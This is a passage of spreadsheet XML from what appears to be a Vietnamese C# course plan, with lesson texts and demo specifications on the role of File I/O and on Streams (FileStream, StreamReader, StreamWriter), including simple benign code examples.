Ví dụ, hãy tưởng tượng một ứng dụng soạn thảo văn bản. Nếu không có File I/O, bạn sẽ không thể lưu tài liệu của mình. Mỗi khi bạn đóng ứng dụng, tất cả công sức gõ phím của bạn sẽ tan biến. Rõ ràng, File I/O là xương sống cho khả năng lưu trữ và phục hồi thông tin của hầu hết các ứng dụng hiện đại.
Dữ liệu Tạm thời trong Bộ nhớ và Dữ liệu Lâu dài trên Đĩa cứng
Để hiểu rõ hơn về vai trò của File I/O, chúng ta cần phân biệt hai loại lưu trữ dữ liệu chính mà một ứng dụng sử dụng:
Dữ liệu Tạm thời (Volatile Data) trong Bộ nhớ RAM:
Khi một chương trình đang chạy, các biến, đối tượng và dữ liệu mà nó đang xử lý đều được lưu trữ trong bộ nhớ truy cập ngẫu nhiên (RAM). RAM cung cấp tốc độ truy cập rất nhanh, cho phép chương trình hoạt động mượt mà và hiệu quả. Tuy nhiên, RAM là bộ nhớ "bay hơi" (volatile). Điều này có nghĩa là khi chương trình kết thúc, máy tính tắt nguồn, hoặc thậm chí khi chương trình gặp lỗi và dừng đột ngột, tất cả dữ liệu trong RAM của chương trình đó sẽ bị xóa sạch và không thể phục hồi. Đây là lý do tại sao dữ liệu trong RAM được gọi là "tạm thời".
Hãy hình dung RAM như một bảng trắng lớn mà bạn sử dụng trong một cuộc họp. Bạn viết ý tưởng, vẽ sơ đồ, tính toán nhanh chóng. Nhưng khi cuộc họp kết thúc, bạn xóa bảng trắng đi, và tất cả thông tin đó biến mất.
Dữ liệu Lâu dài (Persistent Data) trên Đĩa cứng:
Ngược lại, dữ liệu được lưu trữ trên đĩa cứng (HDD), ổ đĩa thể rắn (SSD), hoặc các thiết bị lưu trữ không bay hơi khác là "lâu dài" (non-volatile) hay "bền vững". Dữ liệu này vẫn tồn tại ngay cả khi máy tính tắt nguồn hoặc chương trình không còn chạy. File I/O chính là cơ chế để di chuyển dữ liệu từ RAM ra đĩa cứng và ngược lại, đảm bảo thông tin không bị mất đi.
Tiếp tục với ví dụ bảng trắng, đĩa cứng giống như việc bạn ghi lại tất cả các ghi chú quan trọng từ bảng trắng vào một cuốn sổ tay hoặc lưu chúng thành một tài liệu trên máy tính. Cuốn sổ hoặc tài liệu đó sẽ giữ thông tin cho đến khi bạn chủ động xóa nó đi.
Sự phân biệt này rất quan trọng. Mọi ứng dụng muốn "ghi nhớ" trạng thái, cài đặt, hoặc dữ liệu người dùng giữa các lần chạy đều phải sử dụng File I/O để lưu trữ thông tin một cách lâu dài.
Các trường hợp sử dụng phổ biến của File I/O
File I/O được ứng dụng rộng rãi trong nhiều tình huống khác nhau. Dưới đây là một số ví dụ điển hình:
Lưu trữ Cấu hình (Configuration)
Hầu hết các ứng dụng đều có các cài đặt hoặc tùy chỉnh mà người dùng hoặc nhà phát triển muốn duy trì giữa các phiên làm việc. Các cài đặt này có thể bao gồm:
Tùy chọn người dùng: Ngôn ngữ giao diện, chủ đề màu sắc, kích thước phông chữ.
Cài đặt ứng dụng: Đường dẫn đến cơ sở dữ liệu, địa chỉ máy chủ, cổng kết nối.
Tham số khởi động: Các giá trị mặc định khi ứng dụng được mở.
Thay vì yêu cầu người dùng nhập lại các tùy chọn này mỗi lần khởi động, ứng dụng sẽ lưu chúng vào một file cấu hình trên đĩa. Khi ứng dụng khởi động lại, nó sẽ đọc file này để khôi phục các cài đặt đã lưu. Trong C#, các file cấu hình phổ biến bao gồm appsettings.json hoặc các file .config (XML).
{
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "AllowedHosts": "*",
  "DatabaseConnection": "Server=myServer;Database=myData;User Id=user;Password=password;"
}
Đoạn mã trên là ví dụ về nội dung file appsettings.json thường dùng để lưu cấu hình ứng dụng C#.
Ghi Nhật ký (Logging)
Ghi nhật ký là một kỹ thuật quan trọng để theo dõi hoạt động của ứng dụng, phát hiện lỗi và gỡ lỗi. Khi một ứng dụng hoạt động, nó có thể ghi lại các sự kiện quan trọng vào một file nhật ký (log file). Các sự kiện này có thể bao gồm:
Thông báo thông tin (Information): Ứng dụng đã khởi động thành công, một tác vụ đã hoàn thành.
Cảnh báo (Warning): Một sự kiện không mong muốn xảy ra nhưng không làm ứng dụng dừng lại.
Lỗi (Error): Một vấn đề nghiêm trọng đã xảy ra, cần được kiểm tra.
Gỡ lỗi (Debug): Thông tin chi tiết dành cho nhà phát triển trong quá trình gỡ lỗi.
Các file nhật ký thường được lưu trữ trên đĩa và có thể được xem xét bởi nhà phát triển hoặc quản trị viên hệ thống để phân tích hiệu suất, chẩn đoán sự cố hoặc kiểm tra bảo mật. Việc ghi nhật ký vào file đảm bảo rằng thông tin này vẫn còn nguyên vẹn ngay cả khi ứng dụng gặp sự cố hoặc đã dừng hoạt động.
Xuất Dữ liệu và Báo cáo
Nhiều ứng dụng cần khả năng xuất dữ liệu ra các định dạng file khác nhau để người dùng có thể sử dụng bên ngoài ứng dụng, chia sẻ với người khác, hoặc nhập vào các hệ thống khác. Các trường hợp phổ biến bao gồm:
Xuất sang CSV/Excel: Các ứng dụng kinh doanh thường cần xuất dữ liệu bảng (ví dụ: danh sách khách hàng, đơn hàng) sang định dạng CSV (Comma Separated Values) hoặc Excel để phân tích hoặc báo cáo.
Tạo báo cáo PDF: Nhiều hệ thống cần tạo các báo cáo định dạng cố định (hóa đơn, báo cáo tài chính) dưới dạng file PDF để in ấn hoặc lưu trữ.
Lưu trữ dữ liệu người dùng: Các ứng dụng chỉnh sửa ảnh, video hoặc văn bản cho phép người dùng lưu tác phẩm của họ vào các file có định dạng riêng (ví dụ: .psd, .doc, .mp4).
Trong tất cả các trường hợp này, File I/O là cơ chế cơ bản giúp ứng dụng chuyển đổi dữ liệu từ bộ nhớ thành một định dạng file cụ thể và lưu trữ nó trên đĩa.
Tóm lại, File I/O là một thành phần không thể thiếu trong phát triển ứng dụng C#. Nó cho phép các chương trình vượt qua giới hạn của bộ nhớ tạm thời, lưu trữ và phục hồi dữ liệu một cách lâu dài, từ đó mang lại tính năng mạnh mẽ và trải nghiệm người dùng hoàn chỉnh. Trong các bài học tiếp theo, chúng ta sẽ tìm hiểu cụ thể cách C# cung cấp các công cụ để thực hiện các thao tác này, bắt đầu với khái niệm Stream – một cầu nối quan trọng giữa ứng dụng và hệ thống file.</t>
        </is>
      </c>
      <c r="W30" s="22" t="inlineStr">
        <is>
          <t># Vai trò của File I/O trong ứng dụng
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích File I/O (Input/Output) là gì và vì sao ứng dụng cần nó.
- Phân biệt dữ liệu tạm thời trong RAM với dữ liệu lâu dài trên ổ đĩa.
- Kể ra các trường hợp dùng File I/O phổ biến: cấu hình, nhật ký, xuất dữ liệu.
- Nhận ra hai lệnh `File.WriteAllLines` và `File.ReadAllLines` để lưu và nạp lại danh sách chuỗi.
- Quan sát bằng hoạt động mô phỏng dữ liệu biến mất khi tắt chương trình, còn dữ liệu trong tệp thì vẫn còn.
## File I/O là gì?
Một ứng dụng thường cần "nhớ" thông tin giữa các lần chạy: cài đặt, ghi chú, tài liệu đang soạn. **File I/O (File Input/Output)** là khả năng của chương trình **đọc** dữ liệu từ tệp (file) trên thiết bị lưu trữ và **ghi** dữ liệu vào tệp đó.
Nếu không có File I/O, mỗi khi đóng ứng dụng, mọi dữ liệu nó tạo ra sẽ biến mất. Hãy tưởng tượng một trình soạn thảo văn bản không cho lưu: bạn gõ cả buổi rồi đóng cửa sổ là mất sạch.
## RAM và ổ đĩa
Dữ liệu của một chương trình có thể nằm ở hai nơi:
| | RAM (bộ nhớ) | Ổ đĩa (HDD, SSD) |
|---|---|---|
| Tính chất | **Tạm thời** (volatile) | **Lâu dài** (persistent) |
| Tốc độ | Rất nhanh | Chậm hơn |
| Khi tắt chương trình hoặc tắt máy | Bị xóa sạch | Vẫn còn |
| Chứa gì | Biến, đối tượng, danh sách đang chạy | Tệp: văn bản, cấu hình, ảnh... |
Hãy hình dung RAM như tấm bảng trắng trong buổi họp: viết nhanh, xóa nhanh, hết họp là mất. Ổ đĩa giống cuốn sổ tay: ghi chép chậm hơn một chút nhưng giữ được cho đến khi bạn xóa. **File I/O là cách chép dữ liệu từ "bảng trắng" vào "sổ tay" và ngược lại.**
Khi bạn khai báo `var notes = new List&lt;string&gt;();`, danh sách nằm trong RAM. Muốn nó sống qua lần chạy sau, phải ghi nó ra tệp.
## Ví dụ: lưu và nạp lại ghi chú
C# có sẵn lớp `File` trong `System.IO` với các phương thức ngắn gọn. Chương trình dưới đây lưu 3 ghi chú vào tệp `notes.txt`, mỗi ghi chú một dòng:
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static void Main()
    {
        var notes = new List&lt;string&gt;();
        notes.Add("Mua sữa");
        notes.Add("Học C#");
        notes.Add("Gọi mẹ");
        File.WriteAllLines("notes.txt", notes);   // ghi 3 dòng ra tệp
    }
}
```
Lần chạy sau, chương trình đọc tệp để lấy lại dữ liệu:
```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
public class Program
{
    public static void Main()
    {
        var notes = File.ReadAllLines("notes.txt").ToList();
        Console.WriteLine(notes.Count);   // 3
    }
}
```
Nếu bỏ lệnh `File.WriteAllLines` ở lần chạy đầu, lần chạy sau sẽ bắt đầu với danh sách rỗng, và `Count` là 0.
## Các trường hợp dùng File I/O phổ biến
### Lưu cấu hình
Ứng dụng lưu cài đặt ra tệp để không bắt người dùng nhập lại mỗi lần mở: ngôn ngữ giao diện, màu nền, địa chỉ máy chủ, chuỗi kết nối cơ sở dữ liệu. Khi khởi động, ứng dụng đọc tệp để khôi phục. Trong .NET, tệp cấu hình phổ biến là `appsettings.json`:
```json
{
  "Logging": {
    "LogLevel": { "Default": "Information" }
  },
  "AllowedHosts": "*"
}
```
### Ghi nhật ký (logging)
Ứng dụng ghi lại sự kiện quan trọng vào tệp log: thông tin (ứng dụng đã khởi động), cảnh báo, lỗi, thông tin gỡ lỗi. Nhờ tệp, lập trình viên vẫn xem lại được nguyên nhân sự cố ngay cả khi ứng dụng đã dừng.
### Xuất dữ liệu và lưu tác phẩm
Ứng dụng xuất danh sách khách hàng, đơn hàng ra tệp CSV, tạo báo cáo PDF để in hoặc chia sẻ, hoặc cho người dùng lưu bài viết, ảnh, video vào tệp riêng. Ở mọi trường hợp, File I/O chuyển dữ liệu trong bộ nhớ thành một định dạng tệp cụ thể trên ổ đĩa.
## Hoạt động: Tắt rồi chạy lại
Mô phỏng dưới đây có hai cột chạy song song. Mỗi cột hiển thị trạng thái chương trình (đèn xanh khi đang chạy, xám khi đã tắt), một khung **RAM** và một khung **Ổ đĩa**. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Tắt rồi chạy lại**. Cột trái là **Chỉ lưu trong biến**, cột phải là **Lưu thêm vào tệp**. Cả hai thêm 3 ghi chú "Mua sữa", "Học C#", "Gọi mẹ" vào `List`. Ô mới trong RAM hiện màu xanh và `Count` là 3.
- Ở cột trái không có lệnh ghi tệp nên khung Ổ đĩa ghi "Chưa có tệp notes.txt". Ở cột phải, `File.WriteAllLines` làm xuất hiện tệp `notes.txt` có 3 dòng trên ổ đĩa.
- Khi **tắt chương trình**, đèn chuyển sang xám và RAM bị xóa trắng ở cả hai cột (các ô ghi chú được đánh dấu là đã xóa). Tệp `notes.txt` ở cột phải vẫn còn nguyên.
- Khi **chạy lại**, RAM của cả hai cột đều trống. Cột trái tạo `List` rỗng và in `0`: ba ghi chú đã mất. Cột phải gọi `File.ReadAllLines`, nạp lại 3 dòng vào RAM và in `3`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vai-tro-cua-file-i-o-trong-ung-dung/" title="Vì sao cần lưu dữ liệu vào tệp?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: RAM chỉ nhớ khi chương trình đang chạy, còn ổ đĩa giữ dữ liệu lâu dài. Tệp giúp dữ liệu tồn tại qua các lần chạy của chương trình.
## Tóm tắt
- **File I/O** là việc chương trình đọc và ghi dữ liệu trong tệp.
- Dữ liệu trong **RAM** là tạm thời, mất khi chương trình tắt; dữ liệu trên **ổ đĩa** là lâu dài.
- Muốn ứng dụng "ghi nhớ" giữa các lần chạy, phải lưu dữ liệu ra tệp.
- Dùng phổ biến cho cấu hình, nhật ký, xuất báo cáo và lưu dữ liệu người dùng.
- Lớp `File` trong `System.IO` có sẵn các lệnh ngắn gọn như `WriteAllLines` và `ReadAllLines`.
- Các bài sau sẽ học khái niệm **Stream**, cầu nối giữa chương trình và tệp.</t>
        </is>
      </c>
    </row>
    <row r="31" ht="409.6" customHeight="1" s="18">
      <c r="A31" s="10" t="n">
        <v>31</v>
      </c>
      <c r="B31" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C31" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu chung về Thao tác File và Stream</t>
        </is>
      </c>
      <c r="D31" s="10" t="inlineStr">
        <is>
          <t>Khái niệm Stream và các loại Stream</t>
        </is>
      </c>
      <c r="E31" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F31" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G31" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H31" s="10" t="inlineStr">
        <is>
          <t>Hình dung stream là dòng chảy byte tuần tự với một vị trí hiện tại (Position).</t>
        </is>
      </c>
      <c r="I31" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J31" s="10" t="inlineStr">
        <is>
          <t>Ống dẫn nằm ngang nối Tệp và Chương trình. Từng byte (ô nhỏ ghi ký tự và mã số) chảy qua ống. Trên dải byte của tệp có con trỏ Position; nhãn Length. Tab Ghi: ống chảy theo chiều ngược lại.</t>
        </is>
      </c>
      <c r="K31" s="10" t="inlineStr">
        <is>
          <t>H11, H20</t>
        </is>
      </c>
      <c r="L31" s="10" t="inlineStr">
        <is>
          <t>Đọc (Tệp → Chương trình) | Ghi (Chương trình → Tệp)</t>
        </is>
      </c>
      <c r="M31" s="10" t="inlineStr">
        <is>
          <t>Đọc: tệp chứa "Hi!" (3 byte: 72, 105, 33). Mở FileStream → Position 0, Length 3.
ReadByte() → 72 ('H'), Position 1. Tiếp → 105 ('i'), → 33 ('!').
ReadByte() lần 4 → −1: đã hết stream.
Thêm một bước: chữ 'Đ' trong UTF-8 chiếm 2 byte (C4 90) để thấy ký tự không luôn bằng 1 byte.
Ghi: WriteByte từng byte, Position và Length cùng tăng.</t>
        </is>
      </c>
      <c r="N31" s="10" t="inlineStr">
        <is>
          <t>"Hi!" và 'Đ'</t>
        </is>
      </c>
      <c r="O31" s="10" t="inlineStr">
        <is>
          <t>Stream đọc/ghi lần lượt theo vị trí; hết dữ liệu thì trả −1.</t>
        </is>
      </c>
      <c r="P31" s="10" t="inlineStr">
        <is>
          <t>FileStream, MemoryStream, NetworkStream đều là Stream: cùng cách đọc/ghi, khác nguồn dữ liệu (nhắc tên ở bước cuối).</t>
        </is>
      </c>
      <c r="Q31" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/khai-niem-stream-va-cac-loai-stream/index.html</t>
        </is>
      </c>
      <c r="R31" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/khai-niem-stream-va-cac-loai-stream/</t>
        </is>
      </c>
      <c r="S31" s="10" t="n"/>
      <c r="T31" s="12" t="n"/>
      <c r="U31" s="12" t="n"/>
      <c r="V31" s="21" t="inlineStr">
        <is>
          <t>Stream là gì? Khái niệm về Luồng Dữ liệu
Trong bài học trước, chúng ta đã tìm hiểu về vai trò thiết yếu của File I/O trong các ứng dụng. Để thực hiện các thao tác đọc và ghi dữ liệu, .NET Framework cung cấp một khái niệm trung tâm được gọi là Stream (luồng).
Hãy hình dung một Stream như một đường ống dẫn dữ liệu. Dữ liệu không được truyền đi một cách tức thời hay toàn bộ, mà được truyền từng chút một, theo một trình tự nhất định, từ một nguồn đến một đích. Nguồn dữ liệu có thể là một file trên đĩa cứng, một kết nối mạng, một vùng nhớ trong RAM, hoặc thậm chí là một thiết bị ngoại vi. Đích dữ liệu cũng có thể là một trong số đó.
Trong C#, tất cả các loại luồng đều kế thừa từ lớp trừu tượng System.IO.Stream. Lớp này cung cấp một giao diện chung để thao tác với các luồng dữ liệu, bất kể nguồn hay đích cụ thể là gì. Nhờ có Stream, lập trình viên không cần quan tâm quá nhiều đến chi tiết triển khai bên dưới của từng loại nguồn/đích dữ liệu, mà có thể sử dụng các phương thức chung như Read(), Write(), Seek(), Flush(), và Close().
Input Stream và Output Stream: Hướng của Dữ liệu
Khi làm việc với Stream, việc xác định hướng của dữ liệu là rất quan trọng. Chúng ta có thể phân loại Stream thành hai loại chính dựa trên hướng truyền tải dữ liệu:
Input Stream (Luồng Đầu vào): Đây là luồng dùng để đọc dữ liệu từ một nguồn và đưa vào chương trình của bạn. Ví dụ, khi bạn đọc nội dung của một file văn bản, dữ liệu từ file sẽ chảy qua Input Stream vào bộ nhớ của ứng dụng để bạn xử lý.
Output Stream (Luồng Đầu ra): Đây là luồng dùng để ghi dữ liệu từ chương trình của bạn ra một đích. Ví dụ, khi bạn lưu một đối tượng vào file, dữ liệu từ ứng dụng sẽ chảy qua Output Stream ra file trên đĩa cứng.
Một số loại Stream có thể hỗ trợ cả hai chiều (đọc và ghi), trong khi một số khác chỉ hỗ trợ một chiều. Việc xác định đúng hướng luồng là bước đầu tiên để đảm bảo bạn thao tác dữ liệu một cách chính xác.
Các Loại Stream Phổ Biến trong .NET
.NET cung cấp nhiều lớp Stream khác nhau để làm việc với các loại nguồn dữ liệu và định dạng dữ liệu khác nhau. Dưới đây là hai nhóm Stream cơ bản và quan trọng nhất khi làm việc với file:
FileStream: Làm việc với Dữ liệu Nhị phân
FileStream là lớp cơ bản nhất để thao tác với các file trên hệ thống. Nó cho phép bạn đọc và ghi dữ liệu ở cấp độ byte (dữ liệu nhị phân). Khi bạn mở một file bằng FileStream, bạn đang tương tác trực tiếp với các byte cấu thành nên file đó.
Khi nào sử dụng FileStream?
Khi bạn cần đọc/ghi các file nhị phân như hình ảnh (.jpg, .png), video (.mp4), file thực thi (.exe), hoặc bất kỳ định dạng file tùy chỉnh nào mà bạn tự định nghĩa ở cấp độ byte.
Khi bạn cần kiểm soát chính xác vị trí đọc/ghi trong file (ví dụ: nhảy đến một byte cụ thể).
Ví dụ cơ bản với FileStream:
using System.IO;
// Ghi dữ liệu nhị phân vào file
byte[] dataToWrite = { 65, 66, 67, 68, 69 }; // ASCII cho "ABCDE"
using (FileStream fsWrite = new FileStream("data.bin", FileMode.Create))
{
    fsWrite.Write(dataToWrite, 0, dataToWrite.Length);
}
// Đọc dữ liệu nhị phân từ file
byte[] dataRead = new byte[5];
using (FileStream fsRead = new FileStream("data.bin", FileMode.Open))
{
    fsRead.Read(dataRead, 0, dataRead.Length);
}
Console.WriteLine($"Dữ liệu đọc được: {string.Join(", ", dataRead)}"); // Output: 65, 66, 67, 68, 69
StreamReader và StreamWriter: Xử lý Dữ liệu Văn bản
Mặc dù FileStream mạnh mẽ, việc làm việc trực tiếp với byte khi xử lý các file văn bản (text files) có thể rất phức tạp, đặc biệt là khi phải xử lý các vấn đề về mã hóa ký tự (encoding). Để giải quyết vấn đề này, .NET cung cấp các lớp StreamReader và StreamWriter.
StreamReader và StreamWriter không phải là các Stream độc lập mà là các lớp bao bọc (wrapper) xung quanh một Stream khác (thường là FileStream). Chúng cung cấp các phương thức tiện lợi để đọc và ghi dữ liệu dưới dạng ký tự (character) và chuỗi (string), đồng thời tự động xử lý việc chuyển đổi giữa byte và ký tự dựa trên một bộ mã hóa đã chọn (ví dụ: UTF-8, ASCII).
Khi nào sử dụng StreamReader và StreamWriter?
Khi bạn cần đọc/ghi các file văn bản như .txt, .log, .csv, .json, .xml, hoặc các file cấu hình.
Khi bạn muốn đọc/ghi từng dòng văn bản một cách dễ dàng.
Khi bạn cần hỗ trợ các bộ mã hóa ký tự khác nhau.
Ví dụ cơ bản với StreamWriter và StreamReader:
using System.IO;
string filePath = "mytextfile.txt";
string content = "Đây là dòng đầu tiên.\nĐây là dòng thứ hai.";
// Ghi dữ liệu văn bản vào file
using (StreamWriter writer = new StreamWriter(filePath))
{
    writer.WriteLine(content);
    writer.WriteLine("Thêm một dòng nữa.");
}
// Đọc dữ liệu văn bản từ file
using (StreamReader reader = new StreamReader(filePath))
{
    string line;
    while ((line = reader.ReadLine()) != null)
    {
        Console.WriteLine(line);
    }
}
Trong ví dụ trên, StreamWriter và StreamReader đã đơn giản hóa việc ghi và đọc chuỗi ký tự, thay vì phải tự chuyển đổi chuỗi thành mảng byte và ngược lại.
Tầm quan trọng của Stream trong Thao tác File
Như chúng ta đã thấy, khái niệm Stream là nền tảng cho mọi hoạt động File I/O trong .NET. Nó mang lại một số lợi ích chính:
Trừu tượng hóa: Stream cung cấp một giao diện thống nhất để làm việc với nhiều nguồn và đích dữ liệu khác nhau, giúp code của bạn dễ tái sử dụng và bảo trì hơn.
Hiệu quả: Thay vì tải toàn bộ nội dung file vào bộ nhớ (có thể gây tràn bộ nhớ với các file lớn), Stream cho phép bạn xử lý dữ liệu theo từng phần nhỏ, giúp tiết kiệm tài nguyên hệ thống.
Linh hoạt: Với các lớp như StreamReader và StreamWriter, bạn có thể dễ dàng chuyển đổi giữa việc làm việc với dữ liệu nhị phân và dữ liệu văn bản, cũng như xử lý các bộ mã hóa ký tự khác nhau.
Việc hiểu rõ về Stream và các lớp dẫn xuất của nó là chìa khóa để làm chủ kỹ năng đọc và ghi file một cách hiệu quả và an toàn trong C#. Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào cách sử dụng từng loại Stream này để thực hiện các tác vụ cụ thể.</t>
        </is>
      </c>
      <c r="W31" s="22" t="inlineStr">
        <is>
          <t># Khái niệm Stream và các loại Stream
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích Stream (luồng) là dòng chảy byte tuần tự giữa chương trình và nguồn hoặc đích dữ liệu.
- Phân biệt luồng đầu vào (đọc) với luồng đầu ra (ghi).
- Nhận ra các loại Stream thường gặp: `FileStream`, `MemoryStream`, `NetworkStream`, và vai trò của `StreamReader` và `StreamWriter`.
- Hiểu `Position` và `Length`, và vì sao `ReadByte()` trả về `-1` khi hết dữ liệu.
- Quan sát từng byte "chảy" qua stream theo chiều đọc và chiều ghi bằng hoạt động mô phỏng.
## Stream là gì?
Dữ liệu trong tệp, qua mạng hay trong bộ nhớ không được chuyển đi một lần mà **từng chút một, theo thứ tự**, từ nguồn đến đích. Hãy hình dung một **đường ống**: byte đi vào đầu này và ra ở đầu kia.
**Stream (luồng)** là đối tượng đại diện cho đường ống đó. Trong C#, mọi luồng đều kế thừa từ lớp trừu tượng `System.IO.Stream`, nên chúng có cách dùng chung dù nguồn hay đích là gì:
| Thành viên | Ý nghĩa |
|---|---|
| `Read()`, `ReadByte()` | Đọc dữ liệu từ luồng |
| `Write()`, `WriteByte()` | Ghi dữ liệu vào luồng |
| `Position` | Vị trí hiện tại trong luồng |
| `Length` | Tổng số byte của luồng (với luồng hỗ trợ) |
| `Seek()` | Nhảy đến một vị trí cụ thể |
| `Flush()` | Đẩy dữ liệu còn nằm trong bộ đệm ra đích |
| `Dispose()` / `Close()` | Đóng luồng, giải phóng tài nguyên |
### Luồng đầu vào và luồng đầu ra
- **Luồng đầu vào** (input): dữ liệu chảy **từ nguồn vào chương trình**. Ví dụ đọc một tệp văn bản.
- **Luồng đầu ra** (output): dữ liệu chảy **từ chương trình ra đích**. Ví dụ lưu dữ liệu vào tệp.
Một số luồng hỗ trợ cả hai chiều, một số chỉ hỗ trợ một chiều.
### Vị trí hiện tại (Position)
Stream luôn **nhớ vị trí** đang đọc hoặc ghi. Mỗi lần đọc một byte, `Position` tăng thêm 1. Khi `Position` bằng `Length`, luồng đã hết dữ liệu và `ReadByte()` trả về `-1`. Giá trị `-1` không thể là một byte hợp lệ (byte từ 0 đến 255), nên nó đủ để báo hiệu "hết".
## Các loại Stream thường gặp
Tất cả đều là `Stream`, chỉ khác nơi chứa dữ liệu:
- **`FileStream`**: đọc và ghi byte của tệp trên đĩa. Dùng cho tệp nhị phân (ảnh, video, tệp tự định nghĩa) hoặc khi cần kiểm soát vị trí đọc ghi.
- **`MemoryStream`**: dữ liệu nằm trong bộ nhớ.
- **`NetworkStream`**: dữ liệu truyền qua kết nối mạng.
Stream chỉ biết **byte**. Với văn bản, ta không muốn tự ghép byte thành chữ, nên .NET có `StreamReader` và `StreamWriter`. Chúng là lớp **bao bọc** (wrapper) quanh một stream khác, tự chuyển qua lại giữa byte và ký tự theo bộ mã hóa (encoding) như UTF-8. Khi làm việc với tệp văn bản (`.txt`, `.csv`, `.json`...), bạn thường dùng hai lớp này, không dùng `FileStream` trực tiếp.
### Một ký tự không luôn là một byte
Chữ `H` trong UTF-8 chiếm 1 byte (mã 72). Nhưng chữ `Đ` chiếm **2 byte** (`C4 90`). Stream không biết chuyện đó: nó chỉ chuyển byte. Việc ghép byte thành ký tự là nhiệm vụ của `StreamReader`.
## Ví dụ: ghi rồi đọc từng byte
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        // Ghi 3 byte: 72 ('H'), 105 ('i'), 33 ('!')
        using (var fs = new FileStream("hi.txt", FileMode.Create))
        {
            fs.WriteByte(72);
            fs.WriteByte(105);
            fs.WriteByte(33);
        }
        // Đọc lại từng byte
        using (var fs = new FileStream("hi.txt", FileMode.Open))
        {
            int b;
            while ((b = fs.ReadByte()) != -1)
            {
                Console.WriteLine($"{b} ('{(char)b}'), Position = {fs.Position}");
            }
            // 72 ('H'), Position = 1
            // 105 ('i'), Position = 2
            // 33 ('!'), Position = 3
        }
    }
}
```
Vòng lặp dừng khi `ReadByte()` trả về `-1`.
## Hoạt động: Byte chảy qua stream
Mô phỏng dưới đây dùng tệp `hi.txt` chứa `Hi!`, tức 3 byte: 72, 105, 33. Hình minh họa có đường ống nối tệp, `Stream` và chương trình, một dãy ô byte có mũi tên chỉ `Position`, và hai chỉ số `Position`, `Length`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đọc (Tệp → Chương trình)**. Sau khi mở `FileStream`, `Position` là 0 và `Length` là 3. Mỗi lần gọi `ReadByte()`, một byte chảy qua ống và chương trình nhận được 72, rồi 105, rồi 33. Ô vừa đọc hiện nổi bật, các ô đã đọc chuyển xanh, `Position` tăng lên 1, 2, 3. Lần gọi thứ 4, `Position` đã bằng `Length` nên `ReadByte()` trả về `-1`: hết stream.
- Ở cuối tab này, bạn thấy ví dụ chữ "Đ": 1 ký tự nhưng chiếm 2 byte UTF-8 là `C4 90`. Stream chỉ biết byte, việc ghép thành chữ là của lớp đọc văn bản.
- Mở tab **Ghi (Chương trình → Tệp)**. `FileMode.Create` tạo tệp rỗng, `Position` và `Length` đều là 0. Mỗi lần `WriteByte`, với 72, 105 rồi 33, một ô mới màu xanh xuất hiện trong tệp, và `Position` cùng `Length` cùng tăng lên 1, 2, 3. Khi hết khối `using`, stream tự đóng và tệp có 3 byte "Hi!".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/khai-niem-stream-va-cac-loai-stream/" title="Stream là dòng chảy byte" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: stream đọc hoặc ghi lần lượt theo vị trí, và hết dữ liệu thì `ReadByte()` trả về `-1`. `FileStream`, `MemoryStream`, `NetworkStream` đều là `Stream`: cùng cách đọc ghi, chỉ khác nơi chứa dữ liệu.
## Lợi ích của Stream
- **Thống nhất:** một cách dùng chung cho tệp, mạng và bộ nhớ, giúp mã dễ tái sử dụng.
- **Tiết kiệm bộ nhớ:** xử lý từng phần nhỏ thay vì nạp cả tệp lớn vào RAM.
- **Linh hoạt:** có thể bọc `StreamReader` hoặc `StreamWriter` để làm việc với văn bản và mã hóa ký tự.
## Tóm tắt
- **Stream** là dòng chảy byte tuần tự giữa chương trình và nguồn hoặc đích dữ liệu.
- Luồng **đầu vào** để đọc, luồng **đầu ra** để ghi; một số luồng làm được cả hai.
- Stream luôn nhớ `Position`; hết dữ liệu thì `ReadByte()` trả về `-1`.
- `FileStream`, `MemoryStream`, `NetworkStream` cùng kế thừa `Stream`, chỉ khác nơi chứa dữ liệu.
- `StreamReader` và `StreamWriter` bao bọc stream để xử lý văn bản, tự đổi giữa byte và ký tự.
- Dùng `using` để stream luôn được đóng đúng cách.</t>
        </is>
      </c>
    </row>
    <row r="32" ht="409.6" customHeight="1" s="18">
      <c r="A32" s="10" t="n">
        <v>32</v>
      </c>
      <c r="B32" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C32" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu chung về Thao tác File và Stream</t>
        </is>
      </c>
      <c r="D32" s="10" t="inlineStr">
        <is>
          <t>Ví dụ đơn giản về việc mở và đóng file</t>
        </is>
      </c>
      <c r="E32" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
